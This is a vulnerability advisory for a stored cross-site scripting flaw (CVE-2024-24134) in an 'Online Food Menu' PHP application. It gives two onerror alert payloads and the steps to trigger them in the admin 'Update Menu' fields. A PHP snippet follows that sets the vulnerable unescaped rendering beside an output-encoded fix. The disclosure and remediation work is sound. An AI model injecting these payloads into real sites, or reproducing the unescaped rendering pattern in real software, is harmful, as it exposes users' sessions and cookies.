- Exploit Title: CVE-2024-24134 : Online Food Menu - Cross-Site Scripting (Stored XSS)
- Date: 2024-11-01
- Exploit Author: Burak Sevben
- Vendor Homepage: https://www.sourcecodester.com/php/17096/online-food-menu-using-php-and-mysql-source-code.html
- Software Link: https://www.sourcecodester.com/download-code?nid=17096&title=Online+Food+Menu+Using+PHP+and+MySQL+with+Source+Code
- Version: 1.0
- Tested on: Windows 11 Home + PHP 8.2.12, Apache 2.4.58
- Payload 1:
<video/src=x onerror=alert(document.domain)>
- Payload 2:
<video/src=x onerror=alert(document.cookie)>
- CVE: CVE-2024-24134
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24134
- https://www.cve.org/CVERecord?id=CVE-2024-24134
- https://nvd.nist.gov/vuln/detail/CVE-2024-24134
- https://github.com/BurakSevben/CVEs/blob/main/CVE-2024-24134.md
The 'Menu Name' and 'Description' fields in the Update Menu section of localhost/food-menu/admin.php are vulnerable to stored cross-site scripting: the submitted values are saved and later rendered into the admin page without output encoding. An attacker could exploit this issue to run arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks.
- Go to localhost/food-menu/admin.php. You will see the previously saved data (menus).
- To update one of the menus, select 'Update Menu'. A window will appear.
- Enter the following payload in the 'Menu Name' field:
<video/src=x onerror=alert(document.domain)>
- XSS will be triggered as soon as you press the Save Changes button.
- Select one of the menus again, choose the 'Update Menu' option, and enter the following payload in the 'Description' section of the window that appears:
<video/src=x onerror=alert(document.cookie)>
- XSS will be triggered as soon as you press the Save Changes button.
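The root cause is the rendering step, not the input form: the saved value is concatenated into HTML as-is. The snippet below is an added illustration, not code from the Online Food Menu project; the column names menu_name and description and the row layout are assumptions. It shows the vulnerable pattern beside the hardened one, fed with the two payloads from this advisory as a constructed database row.

```php
<?php
// Added example (not the Online Food Menu project's own code). The column
// names menu_name / description and the row shape are assumptions.

// Constructed row standing in for what admin.php reads back from MySQL after
// the advisory's payloads have been saved through 'Update Menu'.
$row = [
    'menu_name'   => '<video/src=x onerror=alert(document.domain)>',
    'description' => '<video/src=x onerror=alert(document.cookie)>',
];

// Vulnerable pattern: stored values are concatenated straight into markup,
// so the browser parses the saved <video> tag and runs its onerror handler
// every time an admin views the menu list.
function render_menu_row_vulnerable(array $row): string
{
    return '<tr><td>' . $row['menu_name'] . '</td>'
         . '<td>' . $row['description'] . '</td></tr>';
}

// Hardened pattern: encode on output for the HTML context. ENT_QUOTES also
// covers single-quoted attribute values (e.g. value='...' in the edit form),
// ENT_SUBSTITUTE keeps invalid UTF-8 from silently emptying the output, and
// the explicit charset avoids encoding mismatches.
function esc(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_menu_row_safe(array $row): string
{
    return '<tr><td>' . esc($row['menu_name']) . '</td>'
         . '<td>' . esc($row['description']) . '</td></tr>';
}

// Side by side: the first line carries a live <video> element with an onerror
// handler; the second carries only entity-encoded text that the browser shows
// literally and never executes.
echo render_menu_row_vulnerable($row), PHP_EOL;
echo render_menu_row_safe($row), PHP_EOL;
```

The same esc() call has to wrap the value wherever it is re-displayed, including the pre-filled fields of the 'Update Menu' window; a Content-Security-Policy without 'unsafe-inline' is a useful second layer but does not replace output encoding.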